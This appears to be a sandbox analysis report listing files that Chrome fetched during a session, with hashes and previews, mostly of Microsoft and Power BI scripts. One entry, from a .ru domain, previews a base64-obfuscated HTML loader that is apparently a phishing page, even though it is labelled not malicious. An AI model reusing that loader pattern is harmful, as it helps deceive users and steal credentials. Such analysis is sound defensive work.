                                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):9849
                                                                                                                                                                                                          Entropy (8bit):4.327507698755054
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:0OQGrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubepd:DrzjDYq5FEFLjRJpKJxWrqhKGXy83Y39
                                                                                                                                                                                                          MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                                                                                                                                                          SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                                                                                                                                                          SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                                                                                                                                                          SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):325222
                                                                                                                                                                                                          Entropy (8bit):5.367691970984338
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:eh3BXzfo0nueZL7scQM+Jfp9LWdox+jiQxLxZP6tPIxCeNWNKjPDU+WY:23BMU1scQMqyd2+jx3GIxdWNKrDX
                                                                                                                                                                                                          MD5:AD3820649595F8A338E9BD7664698B79
                                                                                                                                                                                                          SHA1:EA4A174DBD3F9479DBB576B0125E367B773D19EC
                                                                                                                                                                                                          SHA-256:6EC567D0DD63DACDC972CE300766DE3083D7241700F4BAEB851F0347577E0512
                                                                                                                                                                                                          SHA-512:652FFD4376A3179BDA5BA5AA4C20F9B1B7E6BF533713E0B7451EFC3C61ADB87E4C1BBA409855499A808C3D48CCBDD02C9A097C3D3968EBCDF3602E219F961206
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/telemetry.bundle.min.5ac346bb7f2ce9638910.js
                                                                                                                                                                                                          Preview:!function(){var j,J,dv={862:function(j){j.exports=function(J){var M={};function U(A){if(M[A])return M[A].exports;var b=M[A]={i:A,l:!1,exports:{}};return J[A].call(b.exports,b,b.exports,U),b.l=!0,b.exports}return U.m=J,U.c=M,U.d=function(A,b,w){U.o(A,b)||Object.defineProperty(A,b,{enumerable:!0,get:w})},U.r=function(A){typeof Symbol<"u"&&Symbol.toStringTag&&Object.defineProperty(A,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(A,"__esModule",{value:!0})},U.t=function(A,b){if(1&b&&(A=U(A)),8&b||4&b&&"object"==typeof A&&A&&A.__esModule)return A;var w=Object.create(null);if(U.r(w),Object.defineProperty(w,"default",{enumerable:!0,value:A}),2&b&&"string"!=typeof A)for(var V in A)U.d(w,V,function(v){return A[v]}.bind(null,V));return w},U.n=function(A){var b=A&&A.__esModule?function(){return A.default}:function(){return A};return U.d(b,"a",b),b},U.o=function(A,b){return Object.prototype.hasOwnProperty.call(A,b)},U.p="",U(U.s=90)}({17:function(J,M,U){"use strict";M.__esModule=!0,M.d
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):6798
                                                                                                                                                                                                          Entropy (8bit):5.383941368080596
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
                                                                                                                                                                                                          MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                                                                                                          SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                                                                                                          SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                                                                                                          SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                                                                                                                                                          Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (534)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):3288
                                                                                                                                                                                                          Entropy (8bit):4.844125421768654
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3jndjqDCc6oq7zCE/5j/mj/FlqplzC7l+tj+6j+7bq/jzCd9QtjQAjQQHUqCqzCt:3jdNGKmlklm7dYjmd20tqmMA
                                                                                                                                                                                                          MD5:7677F65C1626AB1BDE509437776D4291
                                                                                                                                                                                                          SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                                                                                                                                                          SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                                                                                                                                                          SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-events.min.ACSHASH7677f65c1626ab1bde509437776d4291.js
                                                                                                                                                                                                          Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):3280
                                                                                                                                                                                                          Entropy (8bit):4.696081700274861
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:mVZw3gPuCrA3sLT1m7RArtNmOuLT2LZ0dZyMLtZ/AmVT8TZi:mVZ4gPuCQqBQRArtMOEalxMLtZ47i
                                                                                                                                                                                                          MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                                                                                                          SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                                                                                                          SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                                                                                                          SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-onecloud-util.min.ACSHASH1c7e214f5af8caa06f783a38d40127c6.js
                                                                                                                                                                                                          Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (7461), with CRLF line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):19847
                                                                                                                                                                                                          Entropy (8bit):5.882950994236434
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ENbnu54Y5ZiqCDVvpSoHFinu54Y5ZiqCDVvpSKlrWlrV:EzY5ZiLBuY5ZiLB1lrWlrV
                                                                                                                                                                                                          MD5:7AB1D9B4F3531FFF73A666F498455A15
                                                                                                                                                                                                          SHA1:C0C92974BBEFE125D2C303BC8DA65886B89F47AE
                                                                                                                                                                                                          SHA-256:308DF5384B4B141F9C5BB043BC8A288255EEA82CEEE0558567CFEF7384C1AFA5
                                                                                                                                                                                                          SHA-512:47E730D0B85167FD0A73E148DADCCB6D3236C05528CD0146EA6107F620F9089E0FAE41447AD287107C0B8EC744193E655D2E443E2EB3F2ED5C7B0540B49EF40D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://21.zomelore.ru/rwDHrVWE/
                                                                                                                                                                                                          Preview: Great leaders inspire action. -->..<script>../* It always seems impossible until it&#039;s done. */..if(atob("aHR0cHM6Ly8yMS56b21lbG9yZS5ydS9yd0RIclZXRS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):47692
                                                                                                                                                                                                          Entropy (8bit):5.401573598696506
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                                                                                                                                                                          MD5:B0B3774E70E752266B4CF190E6D95053
                                                                                                                                                                                                          SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                                                                                                                                                          SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                                                                                                                                                          SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):2995
                                                                                                                                                                                                          Entropy (8bit):5.31016261431517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:UDLClHc1raaF3l5sLAPF3LDO6ygLGlS3HOakYRCnOX9YfvHydHapcHaJhuHagfD:qClyLvO6yjS3/R8AyXHQF4ul
                                                                                                                                                                                                          MD5:9241D5BA8B36B1282A47395844CFC145
                                                                                                                                                                                                          SHA1:23E232C7474EE61C07EE0B398E3CAB56664A9398
                                                                                                                                                                                                          SHA-256:467759CFB00F6C80FA43AB73C032A6D12CB413CD3BF06B5A8DD613586F0F4A51
                                                                                                                                                                                                          SHA-512:473915EA52A86202861277858CAADEEEB2BF00B086E603E28A85B49D319A5265B39581B18776AC0B21BACFB5A681D273F73C0A9A920A501B3D28907ADCB23C36
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://app.powerbi.com/13.0.24766.39/images/PowerBI_MasterLogo.svg
                                                                                                                                                                                                          Preview:<svg role="presentation" width="1600" height="1600" viewBox="0 0 1600 1600" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="mask0_8592:56198" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="200" y="0" width="1200" height="1600">..<path d="M1333.25 0C1370.11 0 1400 29.8849 1400 66.75V1533.25C1400 1570.11 1370.11 1600 1333.25 1600H266.667C229.848 1600 200 1570.15 200 1533.33V866.667C200 829.848 229.848 800 266.667 800H525V466.667C525 429.848 554.848 400 591.667 400H850V66.75C850 29.885 879.885 0 916.75 0H1333.25Z" fill="white"/>..</mask>..<g mask="url(#mask0_8592:56198)">..<path d="M1400 66.75L1400 1533.25C1400 1570.11 1370.11 1600 1333.25 1600H916.75C879.885 1600 850 1570.11 850 1533.25L850 66.75C850 29.885 879.885 0 916.75 0H1333.25C1370.12 0 1400 29.8849 1400 66.75Z" fill="url(#paint0_linear_8592:56198)"/>..<g filter="url(#filter0_dd_8592:56198)">..<path d="M1075 466.667V1600H525V466.667C525 429.848 554.848 400 591.667 400H1008.33C1045.15 400 1075 429.848 1075 466.667
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):2503
                                                                                                                                                                                                          Entropy (8bit):5.408295137334717
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:7x8wH+sDe1ByFHKTLvn2KLzKSLDREHOaH3umbHOaH3u/xRHapQbHaJNWHagfq:l8weP1ByXiC/n/qxRFbKWE
                                                                                                                                                                                                          MD5:DD3F89BA65C6149AB84C5D6BFDEEBAEA
                                                                                                                                                                                                          SHA1:6434E0FCA135A582C3232D4991D6EA3D31F58C24
                                                                                                                                                                                                          SHA-256:EAFF6FCBB1CD09AFDA8669C5B637B7F6D107D48F04562FAB6383B31FEEE2E6F0
                                                                                                                                                                                                          SHA-512:B8511E0F1312B1A0C2E4D528BD135129C9C317D0893997084C40758E9654CA82DB28547F11BA0DEC5DC69C259B7E2AB04ED923BF32A29CEF4954C223EEC5B648
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/images/spinner-PBI-logo.6434e0fca135a582c323.svg
                                                                                                                                                                                                          Preview:<svg width="96" height="96" viewBox="0 0 96 96" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0)">..<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="12" y="0" width="72" height="96">..<path d="M52 4C52 1.79086 53.7909 0 56 0H80C82.2091 0 84 1.79086 84 4V92C84 94.2091 82.2091 96 80 96H16C13.7909 96 12 94.2091 12 92V52C12 49.7909 13.7909 48 16 48H32.0001V28C32.0001 25.7909 33.791 24 36.0001 24H52V4Z" fill="white"/>..</mask>..<g mask="url(#mask0)">..<path d="M83.9998 0L83.9998 96H51.9998L51.9998 0H83.9998Z" fill="url(#paint0_linear)"/>..<g filter="url(#filter0_f)">..<path d="M64 28.4V96.4H32V24.4H60C62.2091 24.4 64 26.1909 64 28.4Z" fill="black" fill-opacity="0.2"/>..</g>..<g filter="url(#filter1_f)">..<path d="M64 30V98H32V26H60C62.2091 26 64 27.7909 64 30Z" fill="black" fill-opacity="0.18"/>..</g>..<path d="M64 28V96H32V24H60C62.2091 24 64 25.7909 64 28Z" fill="url(#paint1_linear)"/>..<path d="M11.9998 48V96H43.9998V52C43.9998 49.7909 42.2089 48
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65471)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4004963
                                                                                                                                                                                                          Entropy (8bit):5.608526137357891
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:AqDJZ0Df8/CxDmmu/nwEMPLkdvrCr82Ijcysknuhz1BjR1NYS01tQjmyi:mTPWHljyo
                                                                                                                                                                                                          MD5:B43015D52D9B94E96ED0014BEEC60073
                                                                                                                                                                                                          SHA1:4FF02D873DE449E83D0BD2E8CA0AEE0CCCEC2A5C
                                                                                                                                                                                                          SHA-256:74F25E06CA7E129830D80CE20633807EE402C2163B758A9642A1845C59CADB14
                                                                                                                                                                                                          SHA-512:CEEDE0683CCAEC41D0C203EAE939331F82C0265ACBCFB218476183423EA207BA3C06A1E49FE7D91D6CB1F860801D899255A3BAC3DF340A5B1F3A35B09B97D322
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):681
                                                                                                                                                                                                          Entropy (8bit):5.043291133932798
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:tr1tB3ut9BKXWsFYZjzFWZ8ed8Rfc3EnDiHAxcmjnDiHAxc1tnDiHA/KLtkiHAie:tTB3ut90XOsZ58Rf2ADHxvDHxkDH/Ek7
                                                                                                                                                                                                          MD5:104138E7B8F89DBF7CC66485544A0669
                                                                                                                                                                                                          SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                                                                                                                                                          SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                                                                                                                                                          SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):424
                                                                                                                                                                                                          Entropy (8bit):4.933461267592602
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:trLnU/iyKu5zBOKPWzUqokxJj2D54GxAEBEh:tPnU/Cu5sKMJJ8AEKh
                                                                                                                                                                                                          MD5:C7B06D2C5A8D4232A7AABCA94811C468
                                                                                                                                                                                                          SHA1:5198A33544ADCB248C44BBA46A0B0F199EBB773A
                                                                                                                                                                                                          SHA-256:BD49A09567E62361A0B461C615A7EA2BC991C3DB540B95540C527B2FCBBE79FA
                                                                                                                                                                                                          SHA-512:A198F51C6BE738D50FF3F7A10E17380AC152967EFC104D88150C3D652267357863E8E343AF7C833A49A358858E42D64BAA4391C1DEE73132945AC0224784BDFB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases3?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                          Preview:<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g opacity="0.75">.<path d="M23.166 21V22.5H2.91602L2.16602 21.75V1.5H3.66602V21H23.166Z" fill="#0078D4"/>.</g>.<path d="M23.166 7.14669V9.26919L20.0415 6.14919L12.2415 13.9492H11.178L8.37452 11.1442L3.66602 15.8512V13.7302L7.84352 9.55269H8.90402L11.7075 12.3547L19.5075 4.55469H20.568L23.166 7.14669Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):9539
                                                                                                                                                                                                          Entropy (8bit):4.727148213062689
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:3lGqnBqPmIa4HAb1WWe13GgkNb2c6cN0JL2xl9zbIPcJtQIgGySjye1nGEZ8UhWW:3l/gPmIaP3U2gkNCcUJL2xlq0Jt6G351
                                                                                                                                                                                                          MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                                                                                                                                                          SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                                                                                                                                                          SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                                                                                                                                                          SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12824)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):58060
